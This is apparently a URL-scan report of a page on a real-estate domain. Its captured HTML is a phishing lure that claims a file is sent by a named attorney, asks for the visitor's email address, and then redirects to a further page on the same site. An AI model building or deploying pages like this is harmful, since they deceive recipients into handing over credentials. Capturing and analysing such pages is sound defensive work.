https://crystalbeachrealestate.net/group/

Submitted URL:
https://crystalbeachrealestate.net/group/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 3 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Console log messages · 0 found

Messages logged to the web console

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.1">
   
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            margin: 0;
            padding: 20px;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .consent-form-container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            width: 100%;
        }

        .consent-form-header {
            font-size: 18px;
            margin-bottom: 20px;
            display: block;
            text-align: center;
        }

        .form-group {
            margin-bottom: 20px;
        }

        .rd-label {
            font-size: 14px;
            color: #555;
            display: block;
            margin-bottom: 5px;
        }

        .rd-Input-box {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ddd;
            border-radius: 4px;
        }

        .submit-btn {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            background-color: #007BFF;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .submit-btn:disabled {
            background-color: #ccc;
            cursor: not-allowed;
        }

        .error-message {
            color: red;
            font-size: 12px;
            display: none;
        }

        .error-message.show {
            display: block;
        }
    </style>
</head>
<body>

<div class="consent-form-container">
    <span class="consent-form-header">THIS FILE IS SENT BY ROBERT J. PELPHREY, ESQ.</span>
    <form id="consent-form">
        <div class="form-group">
            <label for="rd" class="rd-label"><span class="cool-grey-600"></span>ENTER YOUR EMAIL ADDRESS TO PROCEED</label>
            <input type="rd" class="rd-Input-box" id="rd" name="rd" required="">
            <span id="rdError" class="error-message">.</span>
        </div>
        <div class="form-group m-t-32">
            <button class="submit-btn" type="submit" id="submit-btn" disabled="">Submit</button>
        </div>
    </form>
</div>

<script>
    document.addEventListener('DOMContentLoaded', function () {
        const rdInput = document.getElementById('rd');
        const submitBtn = document.getElementById('submit-btn');
        const rdError = document.getElementById('rdError');

        // yskm
        function validaterd(rd) {
            const re = /^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6}$/;
            return re.test(String(rd).toLowerCase());
        }

        // lduf
        rdInput.addEventListener('input', function () {
            if (validaterd(rdInput.value)) {
                submitBtn.disabled = false;
                rdError.classList.remove('show');
            } else {
                submitBtn.disabled = true;
                rdError.classList.add('show');
            }
        });

        // judj
        document.getElementById('consent-form').addEventListener('submit', function (eveent) {
            event.preventDefault();
            window.location.href = "https://crystalbeachrealestate.net/buc/lllaw/"; maths
        });
    });
</script>



</body></html>